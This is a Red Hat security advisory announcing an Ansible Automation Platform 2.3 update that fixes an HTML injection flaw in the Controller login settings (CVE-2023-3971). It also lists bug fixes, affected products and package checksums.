Headline
RHSA-2023:4590: Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.3 Product Security and Bug Fix Update
An update is now available for Red Hat Ansible Automation Platform 2.3 Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
Related CVEs:
- CVE-2023-3971: An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.
Skip to navigation Skip to main content
Utilities
- Subscriptions
- Downloads
- Containers
- Support Cases
Infrastructure and Management
- Red Hat Enterprise Linux
- Red Hat Satellite
- Red Hat Subscription Management
- Red Hat Insights
- Red Hat Ansible Automation Platform
Cloud Computing
- Red Hat OpenShift
- Red Hat OpenStack Platform
- Red Hat OpenShift Container Platform
- Red Hat OpenShift Data Science
- Red Hat OpenShift Dedicated
- Red Hat Advanced Cluster Security for Kubernetes
- Red Hat Advanced Cluster Management for Kubernetes
- Red Hat Quay
- Red Hat CodeReady Workspaces
- Red Hat OpenShift Service on AWS
Storage
- Red Hat Gluster Storage
- Red Hat Hyperconverged Infrastructure
- Red Hat Ceph Storage
- Red Hat OpenShift Data Foundation
Runtimes
- Red Hat Runtimes
- Red Hat JBoss Enterprise Application Platform
- Red Hat Data Grid
- Red Hat JBoss Web Server
- Red Hat Single Sign On
- Red Hat support for Spring Boot
- Red Hat build of Node.js
- Red Hat build of Quarkus
Integration and Automation
All Products
Issued:
2023-08-09
Updated:
2023-08-09
RHSA-2023:4590 - Security Advisory
- Overview
- Updated Packages
Synopsis
Moderate: Red Hat Ansible Automation Platform 2.3 Product Security and Bug Fix Update
Type/Severity
Security Advisory: Moderate
Red Hat Insights patch analysis
Identify and remediate systems affected by this advisory.
View affected systems
Topic
An update is now available for Red Hat Ansible Automation Platform 2.3
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Description
Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.
Security Fix(es):
- automation controller: Html injection in custom login info (CVE-2023-3971)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional changes for automation controller:
- automation-controller has been updated to 4.3.11 (AAP-14634)
- receptor has been updated to 1.4.1 (AAP-14641)
- Fixed server error that happens when deleting workflow jobs ran before event partitioning migration (AAP-7965)
- Fixed bug where users could get an erroneous 400 error when disabling or enabling a schedule (AAP-10943)
- Fixed bug causing screen to crash when changing credential type dropdown in launch prompt modal (AAP-11443)
- Fixed an issue with slow database ‘UPDATE’ statements when using nested tasks(include_tasks) causing task manager timeout (AAP-12585)
- Fixed bug where adding new labels to a job through prompting didn’t work (AAP-14205)
- Re-enabled Pendo support by providing the correct pendo api key (AAP-14214)
- Added noopener and noreferrer to Controller UI links that were missing it (AAP-14346)
- Updated links to docs from subscriptions page to reflect only major version being used (AAP-14376)
- Turned off autocomplete on remaining Controller ui forms that were missing that attribute (AAP-14443)
- Fixed bug where forms provided in the custom login info would render and execute. (AAP-14627)
Other changes:
- Initial release of aap-metrics-utility (AAP-14116)
Solution
Red Hat Ansible Automation Platform
Affected Products
- Red Hat Ansible Automation Platform 2.3 for RHEL 9 x86_64
- Red Hat Ansible Automation Platform 2.3 for RHEL 8 x86_64
- Red Hat Ansible Inside 1.1 for RHEL 9 x86_64
- Red Hat Ansible Inside 1.1 for RHEL 8 x86_64
- Red Hat Ansible Developer 1.0 for RHEL 9 x86_64
- Red Hat Ansible Developer 1.0 for RHEL 8 x86_64
Fixes
- BZ - 2226965 - CVE-2023-3971 Controller: Html injection in custom login info
Red Hat Ansible Automation Platform 2.3 for RHEL 9
SRPM
aap-metrics-utility-0.0.1-1.el9ap.src.rpm
SHA-256: 7f14df94f4c20333a97b119d362d6839208d6d5e5d07268dcf6165a70547f28f
automation-controller-4.3.11-1.el9ap.src.rpm
SHA-256: 9ee07adf5fa846a6f44adc5acd8b69ff932fa37f165085f04bfbe9e10c51024d
receptor-1.4.1-1.el9ap.src.rpm
SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356
x86_64
aap-metrics-utility-0.0.1-1.el9ap.noarch.rpm
SHA-256: 2301e65c3ce8e27881e03896f5cb721c08c3be7fd660113ed990ef77e69a3ec3
automation-controller-4.3.11-1.el9ap.x86_64.rpm
SHA-256: 2168b43483c0ece5c95a014331652c1b90bf3d03206cb9f686f012022617c0c0
automation-controller-cli-4.3.11-1.el9ap.x86_64.rpm
SHA-256: 54b3aa2454830d2e9c09bc71acce1c9348a6f8ad25e5231de22a1287b292933d
automation-controller-server-4.3.11-1.el9ap.x86_64.rpm
SHA-256: 99163dfa17eebd76f122eda5baa0cdfd974e27bb7bebc83cea1158e41d1338af
automation-controller-ui-4.3.11-1.el9ap.x86_64.rpm
SHA-256: ee51cc9fdef0ff468f3e909ace769ea6f08675e72e02f3e5df0230a97831ce58
automation-controller-venv-tower-4.3.11-1.el9ap.x86_64.rpm
SHA-256: 8630cbcab523dffc5976044bd5f6443bcb32ab05600617fb82d9cda590833d78
receptor-1.4.1-1.el9ap.x86_64.rpm
SHA-256: 8ed9b998593e0090e61cd9c5584631f8b54ce7cb185a44181107b32321faa0e7
receptorctl-1.4.1-1.el9ap.noarch.rpm
SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde
Red Hat Ansible Automation Platform 2.3 for RHEL 8
SRPM
aap-metrics-utility-0.0.1-1.el8ap.src.rpm
SHA-256: ac14922f6e98dd1f23e14f925edc0f2b3cb6d4bc2534c11cd818764e3ae499c3
automation-controller-4.3.11-1.el8ap.src.rpm
SHA-256: 4f9de69b7284d9c7f243b52c20640a15ee2a8370a9df40551f83afb5f2d5428c
receptor-1.4.1-1.el8ap.src.rpm
SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76
x86_64
aap-metrics-utility-0.0.1-1.el8ap.noarch.rpm
SHA-256: e2aa035ac5bb4dff6aba61c52ad8c00b476921f5238c660302b6a3802beffe47
automation-controller-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 7bdfd7ec024924aee4b0f00d5f423a9b3747a7c9a3eeb93aba6fe0f9d336b4a9
automation-controller-cli-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 69443cd3fa76ae98df4e88cc31b22139d8737de205a9d6075f787eb4be11b9e7
automation-controller-server-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 2f1b5171041b94f85260fcee9b0aa801d8063a26d0b81a5ee251653df0bc0bc1
automation-controller-ui-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 00784ed8eebe88e1e8faac9dc93e261fda7c3a7db5125469dfcf15e62cb6e3ad
automation-controller-venv-tower-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 7b8e605eab2ce9cb69ebd7bd3a8278436f829196aa3881d5a2824f9c58993970
receptor-1.4.1-1.el8ap.x86_64.rpm
SHA-256: e5f6f5fec1daae6087c2fe09e050b8af2fbe288d262d59cf5a677a2a8258bfc2
receptorctl-1.4.1-1.el8ap.noarch.rpm
SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11
Red Hat Ansible Inside 1.1 for RHEL 9
SRPM
receptor-1.4.1-1.el9ap.src.rpm
SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356
x86_64
receptorctl-1.4.1-1.el9ap.noarch.rpm
SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde
Red Hat Ansible Inside 1.1 for RHEL 8
SRPM
receptor-1.4.1-1.el8ap.src.rpm
SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76
x86_64
receptorctl-1.4.1-1.el8ap.noarch.rpm
SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11
Red Hat Ansible Developer 1.0 for RHEL 9
SRPM
receptor-1.4.1-1.el9ap.src.rpm
SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356
x86_64
receptorctl-1.4.1-1.el9ap.noarch.rpm
SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde
Red Hat Ansible Developer 1.0 for RHEL 8
SRPM
receptor-1.4.1-1.el8ap.src.rpm
SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76
x86_64
receptorctl-1.4.1-1.el8ap.noarch.rpm
SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11
The Red Hat security contact is [email protected]. More contact details at https://access.redhat.com/security/team/contact/.
Related news
An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.
Red Hat Security Advisory 2023-4590-01 - Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language. Issues addressed include a html injection vulnerability.
An update is now available for Red Hat Ansible Automation Platform 2.4 Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-3971: An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.